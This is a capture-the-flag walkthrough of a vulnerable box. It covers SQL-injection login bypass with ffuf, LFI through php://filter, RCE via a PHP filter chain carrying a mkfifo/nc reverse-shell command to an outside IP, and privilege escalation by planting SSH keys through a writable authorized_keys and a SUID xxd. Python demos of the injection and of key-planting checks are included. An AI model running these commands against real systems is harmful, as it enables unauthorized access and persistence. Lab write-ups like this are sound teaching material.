nmap scan
A lot of ports appear to be open, but since this is a CTF the interesting ones were 22 (SSH) and 80 (HTTP).
Trying port 80 first to see what is hosted there.
Web-Access
After opening it in the browser I saw a website hosted there. First I tried directory brute-forcing and subdomain enumeration, but found nothing interesting.
So I went to the login page and started working on it.
I intercepted a login request with Burp, then fed it to sqlmap to test for SQL injection.
The results showed that the username parameter was injectable, but sqlmap failed to exploit it because the application answered with a redirect to another page.
Then I tried ffuf with the SQL login-bypass wordlist from HackTricks.
payload:
ffuf -w login-bypass.md -X POST -u http://IP/login.php -d 'username=FUZZ&password=asdf' -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -fw 227
ffuf tries every line of the wordlist as the username. -fw 227 filters out all responses with 227 words, which here is the normal failed-login page, so only the responses that differ remain; those came back as a 302 redirect. Use any payload that produced a 302 as the username on the login page and you will be logged in.
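Why the wordlist works, as an added example that is not part of the original write-up: a constructed SQLite-backed login in Python with the string-concatenated (injectable) query beside a parameterized one, fuzzed with a handful of HackTricks-style payloads and filtered by word count the way ffuf -fw 227 does. The user table, the password "asdf", the 227-word failure page and the redirect are all made up for the demo, and the payloads are a constructed subset of the real list. One caveat the run makes visible: SQLite, unlike MySQL, does not treat # as a comment, so a payload such as admin' # only bypasses MySQL-style backends.

```python
import sqlite3

# Constructed demo account; the real target's users are unknown.
DEMO_USERS = [("admin", "s3cretpassw0rd")]

# A few entries in the style of HackTricks' login-bypass wordlist (constructed).
PAYLOADS = [
    "admin",                # plain guess, no injection
    "admin' -- ",           # comments out the password check
    "admin' #",             # same idea, but # is only a comment on MySQL-style backends
    "' OR 1=1 -- ",         # always-true condition, password check commented out
    "' or '1'='1",          # classic, but AND binds tighter than OR, so it fails here
    "admin' AND 1=2 -- ",   # injects fine, but the condition is false
]


def open_db():
    """In-memory stand-in for the CTF's login backend."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", DEMO_USERS)
    return db


def vulnerable_login(db, username, password):
    """String-concatenated query, as a typical injectable login.php builds it."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    try:
        row = db.execute(query).fetchone()
    except sqlite3.Error:
        return None          # broken SQL: the app would show the login page again
    return row[0] if row else None


def safe_login(db, username, password):
    """Same check with bound parameters: input can never change the query shape."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def fake_response(user):
    """Mimic the app: 302 redirect on success, a 227-word login page on failure."""
    if user is not None:
        return 302, "Location: /dashboard.php"
    return 200, "Login failed. " + "word " * 225


def fuzz(login, payloads, password="asdf"):
    """ffuf-style loop: each payload goes in as the username and only responses
    whose word count is not 227 (the known failure page) are kept."""
    db = open_db()
    hits = []
    for payload in payloads:
        status, body = fake_response(login(db, payload, password))
        if len(body.split()) != 227:
            hits.append((payload, status))
    return hits


if __name__ == "__main__":
    print("vulnerable:", fuzz(vulnerable_login, PAYLOADS))
    print("safe:      ", fuzz(safe_login, PAYLOADS))
```

Against the concatenated query only the comment-based payloads survive the filter; against the parameterized one nothing does, which is the fix the application needed.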
Getting Reverse-shell
The only vulnerability that came to mind at first glance was LFI, but finding where to trigger it was somewhat challenging.
The file parameter of secret-script.php accepts PHP stream wrappers, so the source of PHP pages can be read through php://filter with convert.base64-encode: the base64 output is not valid PHP, so include() returns it to the page instead of executing it.
curl -s 'http://10.10.166.133/secret-script.php?file=php://filter/convert.base64-encode/resource=secret-script.php' | base64 -d
<?php
//echo "Hello World";
if(isset($_GET['file'])) {
$file = $_GET['file'];
include($file);
}
?>
This page passes the file parameter straight to include(), so any local path or stream wrapper the attacker names gets loaded.
RCE with PHP Filter Chain
Use a PHP filter chain to turn the include() into RCE. The chain of iconv charset conversions makes PHP produce the attacker's PHP code from an empty resource, so nothing has to be uploaded or poisoned on disk first.
First generate the payload with synacktiv's php_filter_chain_generator (https://github.com/synacktiv/php_filter_chain_generator):
python3 php_filter_chain_generator.py --chain '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.17.4 4444 >/tmp/f"); ?>' | grep '^php' > payload.txt
With a listener waiting on 10.8.17.4:4444, send the chain as the file parameter and catch the reverse shell:
curl -s "http://10.10.166.133/secret-script.php?file=$(cat payload.txt)"
User flag
After getting a reverse shell as www-data, I looked for the users on the machine.
Going to /home I found only one user, "comte".
Time to list everything in comte's home directory.
The most interesting directory there is .ssh.
Listing the files in .ssh showed something more interesting: authorized_keys is writable :)
From there it is possible to write your own SSH public key into it and access the machine as comte.
Now generate an SSH key pair (ssh-keygen).
Copy the public key into /home/comte/.ssh/authorized_keys, then ssh in as comte with the private key (ssh -i id_rsa comte@IP).
Now you can read the user flag.
Root Flag
Starting by checking what the current user is allowed to run with elevated privileges.
User comte has permission to run exploit.timer as root.
Let's locate the file first.
While locating exploit.timer I also found exploit.service; the content of those files is shown above.
So exploit.timer restarts exploit.service, and when exploit.service restarts it copies xxd to /opt and sets the SUID bit on it. A SUID-root xxd can write to any file: xxd -r reverses a hex dump into the output path you name, and it does so with root's privileges.
Now we can use it to write our SSH public key into root's authorized_keys and get a root shell over SSH. The key line is hex-dumped with the normal xxd and reversed by the SUID copy, which performs the privileged write:
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINxn9MiYjHji3FHPTZ1r9oUSSoiWB7b7kEXrlC6Fb5tT kali@kali' | xxd | /opt/xxd -r - /root/.ssh/authorized_keys
Note that xxd -r patches the output file in place at the dump offsets rather than truncating it, so if a longer authorized_keys already existed its tail would be left behind after our line; sshd skips lines it cannot parse, so that does not stop the login.
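The two findings that carried this box, a writable authorized_keys in a user's home (user flag) and a SUID binary dropped into /opt (root flag), as a small post-exploitation check in Python. This is an added example, not code from the write-up: it enumerates writable authorized_keys files and SUID executables under given roots, validates an OpenSSH public key line the way sshd will (type, base64 blob, embedded type matching), and appends it on its own line with the 0600 mode sshd expects. demo() builds a constructed fake home and /opt tree in a temp directory, so it runs offline and never touches the CTF machine; the key line it adds has the correct ed25519 wire format with all-zero key bytes and is constructed too. The SUID xxd -r write itself is not reproduced here.

```python
import base64
import binascii
import os
import stat
import tempfile

# Key types sshd accepts; anything else in authorized_keys is ignored.
KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def valid_pubkey_line(line):
    """True if line is '<type> <base64 blob> [comment]' and the blob's
    embedded, length-prefixed type string matches the text type, as sshd requires."""
    parts = line.strip().split()
    if len(parts) < 2 or parts[0] not in KEY_TYPES:
        return False
    try:
        blob = base64.b64decode(parts[1], validate=True)
    except binascii.Error:
        return False
    if len(blob) < 4:
        return False
    n = int.from_bytes(blob[:4], "big")
    return blob[4:4 + n] == parts[0].encode()


def writable_authorized_keys(home_root):
    """authorized_keys files under home_root/<user>/.ssh that we can write to."""
    hits = []
    for user in sorted(os.listdir(home_root)):
        path = os.path.join(home_root, user, ".ssh", "authorized_keys")
        if os.path.isfile(path) and os.access(path, os.W_OK):
            hits.append(path)
    return hits


def suid_binaries(search_root):
    """Regular files under search_root with the SUID bit set (a SUID-root xxd, say)."""
    hits = []
    for dirpath, _dirs, files in os.walk(search_root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def add_key(path, pubkey_line):
    """Append a validated key line to a writable authorized_keys, keeping it on
    its own line and restoring mode 0600. Returns the number of valid key lines."""
    if not valid_pubkey_line(pubkey_line):
        raise ValueError("not a well-formed OpenSSH public key line")
    with open(path) as f:
        existing = f.read()
    with open(path, "a") as f:
        if existing and not existing.endswith("\n"):
            f.write("\n")          # never glue our key onto a previous line
        f.write(pubkey_line.strip() + "\n")
    os.chmod(path, 0o600)
    with open(path) as f:
        return sum(1 for entry in f if valid_pubkey_line(entry))


def demo():
    """Run the checks on a constructed fake filesystem in a temp dir (not the CTF box)."""
    root = tempfile.mkdtemp()
    home, opt = os.path.join(root, "home"), os.path.join(root, "opt")
    ssh_dir = os.path.join(home, "comte", ".ssh")
    os.makedirs(ssh_dir)
    os.makedirs(opt)
    ak = os.path.join(ssh_dir, "authorized_keys")
    with open(ak, "w") as f:
        f.write("ssh-rsa notakey oldentry")     # junk line with no trailing newline
    os.chmod(ak, 0o666)                         # the misconfiguration: writable
    fake_xxd = os.path.join(opt, "xxd")
    with open(fake_xxd, "wb") as f:
        f.write(b"\x7fELF")                     # stand-in for the copied binary
    os.chmod(fake_xxd, 0o4755)                  # SUID bit, as exploit.service sets it
    # Constructed ed25519 key line: correct wire format, all-zero key bytes.
    blob = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(32)
    key_line = "ssh-ed25519 " + base64.b64encode(blob).decode() + " attacker@kali"
    return {
        "writable": [os.path.relpath(p, root) for p in writable_authorized_keys(home)],
        "suid": [os.path.relpath(p, root) for p in suid_binaries(opt)],
        "keys": add_key(ak, key_line),
        "mode": stat.S_IMODE(os.stat(ak).st_mode),
    }


if __name__ == "__main__":
    print(demo())
```

On a real box you would point writable_authorized_keys at /home and suid_binaries at /opt, /usr/local or / (the walk is slow from /, so narrow it), and only then add your own key with add_key; the validation step is what saves you from the silent failure of a mistyped or truncated key line.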
Now ssh in as root with the matching private key.
Now you have the root flag :)